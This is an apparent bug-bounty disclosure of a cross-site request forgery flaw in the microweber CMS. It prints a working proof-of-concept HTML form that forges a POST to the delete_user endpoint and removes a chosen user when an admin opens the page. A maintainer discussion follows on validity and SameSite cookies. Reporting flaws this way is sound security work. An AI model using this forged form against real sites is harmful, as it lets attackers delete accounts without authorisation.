Cross-Site Request Forgery (CSRF) in microweber/microweber
Reported on
Jul 30th 2021
✍️ Description
Attacker able to delete any user if knows the user id parameter value.
🕵️♂️ Proof of Concept
Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the user with id 3 has been deleted.
//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/delete_user" method="POST">
<input type="hidden" name="id" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
Here a user with id value 3 will be deleted after clicking on submit button. 📍 Location app.js#L1
Hey microweber team , can you give some feedbacks to me? thanks so much.
You need to be logged as admin to make this action
Yah the main action of any CSRF attack is that users must be logged in before, excuse me for my bad explanation but this is CSRF and already assigned a CWE to it.
You can set Strict value on SameSite attribute of just one of your cookies and then anybody won't able to perform any CSRF attacks.
Hello Thanks for info
Yes you are correct some 3rd party domain can trick you
This makes a valid issue and we will look how to fix it
Will update you soon
aaahhh thank you sir i was doubting to my experience :))
can you just look at some other reports and validate them too ( they will be hidden until you make a fix for them)
@admin can you change the status of this report like before?
@amammad @peter - I have updated the status of this report to pending. Feel free to mark as valid if you see fit.